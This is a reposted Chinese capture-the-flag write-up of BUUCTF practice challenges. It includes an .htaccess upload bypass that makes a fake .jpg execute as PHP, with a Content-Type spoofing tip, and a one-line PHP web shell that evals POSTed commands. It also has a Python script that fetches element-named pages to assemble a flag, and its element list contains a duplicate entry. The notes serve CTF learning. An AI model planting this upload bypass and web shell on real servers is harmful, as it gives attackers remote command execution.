BUUCTF刷题
作者:互联网
[GXYCTF2019]BabyUpload
.htaccess
记得绕过Content-Type:image/jpeg
<FilesMatch "h3zh1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
h3zh1.jpg
<script language="php">
eval($_POST['cmd']);
</script>
[BJDCTF 2nd]elementmaster
会python编写就好
这个题头秃,还记得初三时背元素周期表得恐惧。
import requests
url = "http://15330266-3d24-4154-9cb8-ad6a25f8ed02.node3.buuoj.cn/"
a_list=['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
flag = ""
for i in a_list:
r = requests.get(url+i+".php")
if(r.status_code==200):#一定得写200因为不是每个元素都存在
# print(url+i+".php")
flag += r.text
print(flag)
[BJDCTF 2nd]Schrödinger
这个题我觉得就记一个时间戳这个知识点就好。
大师傅也说这个题辣眼睛。
做题唯一感受,离谱~。
标签:BUUCTF,url,list,flag,BJDCTF,print,php,刷题 来源: https://www.cnblogs.com/h3zh1/p/12839150.html